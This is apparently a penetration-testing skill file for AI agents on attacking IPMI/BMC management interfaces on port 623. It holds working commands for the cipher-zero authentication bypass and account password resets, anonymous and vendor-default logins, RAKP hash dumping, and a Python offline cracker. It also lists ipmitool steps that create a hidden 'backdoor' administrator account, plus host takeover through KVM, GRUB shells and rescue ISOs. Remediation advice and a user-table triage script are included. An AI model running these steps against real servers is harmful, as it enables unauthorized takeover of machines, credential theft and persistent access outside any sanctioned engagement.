pentesting-ipmi

$npx mdskill add xalgord/xalgorix/pentesting-ipmi

---
name: pentesting-ipmi
description: Testing IPMI / BMC out-of-band management interfaces (default 623/UDP, sometimes TCP) for the cipher-zero authentication bypass, RAKP password-hash retrieval, anonymous/default BMC credentials, cleartext password storage, and host takeover via KVM/SOL during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- ipmi
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting IPMI (port 623)

## When to Use
- Default port `623/udp` (sometimes `623/tcp`) on Baseboard Management Controllers (BMC) — Supermicro, Dell iDRAC, HP iLO, IBM IMM, Fujitsu iRMC, Oracle/Sun ILOM, ASUS iKVM.
- When `nmap`/scanners show `asf-rmcp`/`ipmi` on 623, or you find an out-of-band management LAN.
- BMCs run independent of the host OS/power state, so compromise = persistent, OS-independent control of the server (power, KVM, serial-over-LAN, virtual media).

## Quick Enumeration
```bash
# Find the port (UDP is primary; -sU needs root and is slow, so keep the scope tight)
nmap -n -sU -p 623 --open 10.0.0.0/24
nmap -n -p 623 --open 10.0.0.0/24          # some BMCs also listen on 623/tcp

# Version identification (also reports anonymous/null-user and IPMI 2.0 support flags)
nmap -sU --script ipmi-version -p 623 10.10.10.10
msf > use auxiliary/scanner/ipmi/ipmi_version

# Install the client
apt-get install ipmitool
```

## Critical: Checks Most Often Missed
- **Cipher type 0 (cipher-zero) auth bypass** — IPMI 2.0 flaw (Dan Farmer): with a valid username, **any password is accepted**. Found across HP, Dell, Supermicro BMCs. List and modify users, including resetting passwords:
```bash
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list                 # any password works
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
```
- **RAKP password-hash retrieval** — in the IPMI 2.0 RAKP handshake the BMC answers message 1 with an HMAC (SHA1 or MD5, depending on the cipher suite) keyed with the user's password over values the client already knows (session IDs, both randoms, BMC GUID, role, username). That is, any existing username yields a crackable hash before authentication completes; crack it offline (hashcat mode 7300 for HMAC-SHA1, john format `rakp`):
```bash
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
```
- **Anonymous access** — many BMCs ship with a null username/password account that can reset named accounts:
```bash
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
```
- **Default credentials** — Dell iDRAC `root:calvin`, IBM IMM `USERID:PASSW0RD` (zero), Supermicro `ADMIN:ADMIN`, Oracle/Sun ILOM `root:changeme`, ASUS iKVM `admin:admin`. (HP iLO uses a factory-randomized 8-char password.)
- **Cleartext password storage** — Supermicro stores IPMI passwords in `/nv/PSBlock` or `/nv/PSStore`; readable once you reach the BMC filesystem. Supermicro's UPnP SSDP listener (UDP 1900) had a root-RCE bug (`exploit/multi/upnp/libupnp_ssdp_overflow`).
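The RAKP leak in working code, as an added example that is not from the skill page or its author: it rebuilds the data the BMC signs in RAKP message 2 from constructed session values, computes the HMAC with a candidate password, runs a tiny offline dictionary attack, and emits the two on-disk formats `ipmi_dumphashes` can write (hashcat mode 7300 `salt:hash`, john `user:$rakp$salt$hash`). The session IDs, randoms, GUID, role byte, username and password are all made-up test data.

```python
"""RAKP message-2 HMAC: why a dumped IPMI 2.0 'hash' cracks offline.

Added example, not part of the original skill page. Every session value
below is constructed test data, not a capture from a real BMC.
"""
import hashlib
import hmac

# Per IPMI 2.0 the BMC authenticates RAKP message 2 with
#   HMAC(K_UID, SID_m || SID_c || R_m || R_c || GUID_c || Role_m || ULen || UName)
# where K_UID is the user's password. Cipher suite 3 uses HMAC-SHA1,
# suites 1/2 use HMAC-MD5. Everything except K_UID crosses the wire, so the
# requester ends up holding hash + "salt" for any valid username.


def rakp2_salt(sid_m: bytes, sid_c: bytes, r_m: bytes, r_c: bytes,
               guid_c: bytes, role_m: int, username: bytes) -> bytes:
    """Concatenate the authenticated RAKP2 fields (hashcat calls this the salt)."""
    assert len(sid_m) == 4 and len(sid_c) == 4
    assert len(r_m) == 16 and len(r_c) == 16 and len(guid_c) == 16
    return (sid_m + sid_c + r_m + r_c + guid_c
            + bytes([role_m, len(username)]) + username)


def rakp2_hmac(password: bytes, salt: bytes, digest: str = "sha1") -> bytes:
    """Key-auth code as the BMC computes it. HMAC zero-pads keys shorter than
    the block size, so IPMI's convention of padding the password to 20 bytes
    gives the same result as using the raw password."""
    return hmac.new(password, salt, getattr(hashlib, digest)).digest()


def to_hashcat_7300(salt: bytes, mac: bytes) -> str:
    """hashcat -m 7300 line: <salt_hex>:<hmac_hex>."""
    return f"{salt.hex()}:{mac.hex()}"


def to_john_rakp(username: bytes, salt: bytes, mac: bytes) -> str:
    """john --format=rakp line: <user>:$rakp$<salt_hex>$<hmac_hex>."""
    return f"{username.decode()}:$rakp${salt.hex()}${mac.hex()}"


def crack(salt: bytes, mac: bytes, wordlist, digest: str = "sha1"):
    """Offline dictionary attack: recompute the HMAC per candidate password."""
    for cand in wordlist:
        if hmac.compare_digest(rakp2_hmac(cand.encode(), salt, digest), mac):
            return cand
    return None


# --- constructed session (what a RAKP1/RAKP2 exchange would have carried) ---
SID_M = bytes.fromhex("a4a3a2a0")        # remote console session ID (constructed)
SID_C = bytes.fromhex("0001ff00")        # BMC session ID (constructed)
R_M = bytes(range(16))                   # console random (constructed)
R_C = bytes(range(16, 32))               # BMC random (constructed)
GUID_C = bytes.fromhex("0d15ea5e" * 4)   # BMC GUID (constructed)
ROLE_M = 0x14        # assumption: ADMINISTRATOR (4) with the name-only-lookup bit
USERNAME = b"ADMIN"
BMC_PASSWORD = b"ADMIN"                  # weak vendor default, the HMAC key

SALT = rakp2_salt(SID_M, SID_C, R_M, R_C, GUID_C, ROLE_M, USERNAME)
MAC = rakp2_hmac(BMC_PASSWORD, SALT)

if __name__ == "__main__":
    print(to_hashcat_7300(SALT, MAC))
    print(to_john_rakp(USERNAME, SALT, MAC))
    print("cracked:", crack(SALT, MAC, ["calvin", "PASSW0RD", "ADMIN"]))
```

The salt is 58 bytes plus the username, which is why hashcat and john treat RAKP as a fixed-layout HMAC rather than a password hash: there is no iteration count, so GPU speeds are essentially raw HMAC-SHA1 speeds, and any password in a vendor-default or leaked-password list falls immediately.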

### How to CONFIRM
- Cipher-zero: `auxiliary/scanner/ipmi/ipmi_cipher_zero` reports VULNERABLE, or `ipmitool ... -C 0 ... user list` returns the user table with a wrong password.
- Hash dump: `ipmi_dumphashes` outputs crackable `hmac` hashes per username.
- Anonymous: `ipmitool -U '' -P '' user list` returns the user table.
- Defaults: a documented vendor cred logs in (`user list` succeeds).

## Workflow

### Step 1: Enumerate
Sweep `623/udp`, identify IPMI version and vendor (`ipmi-version`). Vendor tells you which default creds and storage paths to try.

### Step 2: Authenticate / unauth access
Run cipher-zero and anonymous checks first (no creds needed). Dump RAKP hashes for every known or guessed username (vendor default names are a good start) and crack offline (`hashcat -m 7300`). Try vendor default creds.

### Step 3: Exploit / Extract
- With cipher-zero or recovered creds, enumerate and reset accounts via `ipmitool -I lanplus`.
- Crack dumped RAKP hashes to recover real BMC passwords.
- On Supermicro, read stored cleartext passwords (`cat /nv/PSBlock`) once on the BMC.

### Step 4: Post-access / pivot
Administrative BMC access => host takeover:
- **KVM / virtual media**: reboot host into a root shell via GRUB (`init=/bin/sh`) or boot a rescue ISO to manipulate the host disk (insert backdoor, extract data).
- **Serial-over-LAN (SOL)**: take over a logged-in physical/serial console via `ipmitool ... sol`.
- **Persistent backdoor account** (from a compromised host as root, over the local system interface `/dev/ipmi0` with the `ipmi_si`/`ipmi_devintf` modules loaded; no BMC credentials needed because the in-band channel is implicitly trusted):
```bash
ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4          # 4 = ADMINISTRATOR
ipmitool user enable 4
ipmitool channel setaccess 1 4 ipmi=on privilege=4   # if LAN login still fails on channel 1
ipmitool user list
```
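A triage helper for the user table that every check above ends in (`user list` via cipher-zero, anonymous or default creds, and the backdoor account just added). This is an added example, not code from the skill page or its author: it parses constructed `ipmitool user list` output, flags enabled null-name slots (the anonymous account), slots carrying vendor default names (candidates for the default-credential list above), and ADMINISTRATOR accounts outside an expected set, which is also the check a defender would run to catch `backdoor`. The column regex is anchored from the right on the three booleans and the privilege string so an empty name still parses; the sample table is made up.

```python
"""Triage an `ipmitool user list` table for anonymous slots, default names and
unexpected ADMINISTRATOR accounts.

Added example, not part of the original skill page. SAMPLE below is a
constructed table, not captured from a real BMC.
"""
import re

# One row of `ipmitool user list <channel>`: ID, name (may be empty), Callin,
# Link Auth, IPMI Msg, Channel Priv Limit. Anchoring on the booleans and the
# privilege keyword from the right copes with the empty-name case.
ROW_RE = re.compile(
    r"^\s*(?P<id>\d+)\s+(?P<name>.*?)\s*"
    r"(?P<callin>true|false)\s+(?P<link>true|false)\s+(?P<ipmi>true|false)\s+"
    r"(?P<priv>NO ACCESS|CALLBACK|USER|OPERATOR|ADMINISTRATOR|OEM|Unknown.*?)\s*$"
)

# Usernames from the vendor defaults listed on this page.
DEFAULT_NAMES = {"root", "ADMIN", "USERID", "admin"}

# Constructed sample output (header line mimics ipmitool's layout).
SAMPLE = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      NO ACCESS
2   root             true    true       true       ADMINISTRATOR
3   ADMIN            true    false      true       ADMINISTRATOR
4   backdoor         true    false      true       ADMINISTRATOR
5                    true    true       true       USER
"""


def parse_user_list(text: str) -> list[dict]:
    """Return one dict per user slot; header and blank lines are skipped."""
    users = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        users.append({
            "id": int(m["id"]),
            "name": m["name"],
            "ipmi_msg": m["ipmi"] == "true",
            "priv": m["priv"],
        })
    return users


def triage(users: list[dict], expected_admins=frozenset({"root"})) -> dict[str, list[int]]:
    """Slot IDs worth acting on, keyed by finding type."""
    out = {"anonymous_slots": [], "default_names": [], "unexpected_admins": []}
    for u in users:
        # A slot can be used over LAN if IPMI messaging is on or it has any privilege.
        reachable = u["ipmi_msg"] or u["priv"] != "NO ACCESS"
        if u["name"] == "" and reachable:
            out["anonymous_slots"].append(u["id"])
        if u["name"] in DEFAULT_NAMES:
            out["default_names"].append(u["id"])
        if u["priv"] == "ADMINISTRATOR" and u["name"] not in expected_admins:
            out["unexpected_admins"].append(u["id"])
    return out


if __name__ == "__main__":
    for kind, ids in triage(parse_user_list(SAMPLE)).items():
        print(f"{kind}: {ids}")
```

Run it against `ipmitool -I lanplus -H <IP> -U ... -P ... user list 1 > users.txt` and feed the file to `parse_user_list`; slot 1 in the sample is the common factory state (null name, NO ACCESS) and is not flagged, while slot 5 is the anonymous account the `-U '' -P ''` check above would log in with.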

## Key Concepts
| Concept | Description |
|---------|-------------|
| **BMC** | Baseboard Management Controller — independent micro-controller running IPMI; survives OS/power state |
| **Cipher 0** | IPMI 2.0 cipher suite that disables auth — any password accepted for a valid user |
| **RAKP** | IPMI 2.0 auth handshake that leaks a crackable salted password hash per username |
| **lanplus (-I lanplus)** | ipmitool interface for IPMI 2.0 over LAN (RMCP+) |
| **SOL / KVM** | Serial-over-LAN and remote keyboard/video/mouse — full host console control |
| **Anonymous login** | Null user/pass account enabled by default on many BMCs |

## Tools & Systems
| Tool | Purpose |
|------|---------|
| **ipmitool** | Primary client: power control, user mgmt, SOL, password reset (`-I lanplus`, add `-C 0` for cipher-zero). KVM and virtual media go through the vendor web UI / Java / HTML5 client, not ipmitool |
| **nmap ipmi-version NSE** | Version/vendor fingerprint on 623/udp |
| **Metasploit ipmi_cipher_zero** | Detect cipher-zero auth bypass |
| **Metasploit ipmi_dumphashes** | Retrieve RAKP password hashes |
| **Metasploit ipmi_version** | Scanner for IPMI version |
| **hashcat** | Crack dumped RAKP hashes (`-m 7300` for HMAC-SHA1); john `--format=rakp` also works |

## Common Scenarios
### Scenario 1: Cipher-zero full control
A Supermicro BMC is cipher-zero vulnerable; `ipmitool -C 0` lists users and resets `root`, granting KVM/SOL access and a host reboot into a root shell.

### Scenario 2: Hash dump and crack
`ipmi_dumphashes` pulls the RAKP hash for `ADMIN`; hashcat recovers the password, which is reused on the host SSH/web interfaces.

### Scenario 3: Default creds to host takeover
A Dell iDRAC accepts `root:calvin`; virtual media mounts a rescue ISO and a backdoor is written to the host filesystem.

## Output Format
```
## IPMI / BMC Finding

**Service**: IPMI (623/udp)
**Severity**: <Critical|High>
**Target**: <IP>:623  Vendor/Version: <Supermicro | iDRAC | iLO ...> IPMI 2.0

### Evidence
- Cipher-zero auth bypass: VULNERABLE (user list returned with bogus password)
- RAKP hashes dumped for users: <ADMIN, root, ...> (cracked: <yes/no>)
- Anonymous/default creds: <'' / root:calvin> accepted
- Host impact: KVM/SOL access; backdoor account 'backdoor' (ADMINISTRATOR) added

### Reproduction
msf> use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H <IP> -U root -P anything user list

### Recommendation
1. Disable cipher suite 0 on all BMCs
2. Isolate BMCs on a dedicated management VLAN, never Internet-facing
3. Replace default/anonymous credentials; enforce strong unique BMC passwords
4. Patch BMC firmware (e.g. Supermicro UPnP/SSDP); the RAKP hash leak is a protocol design flaw with no patch, so isolation and strong, unique passwords are the only mitigation
5. Disable unused KVM/SOL/virtual-media features
```
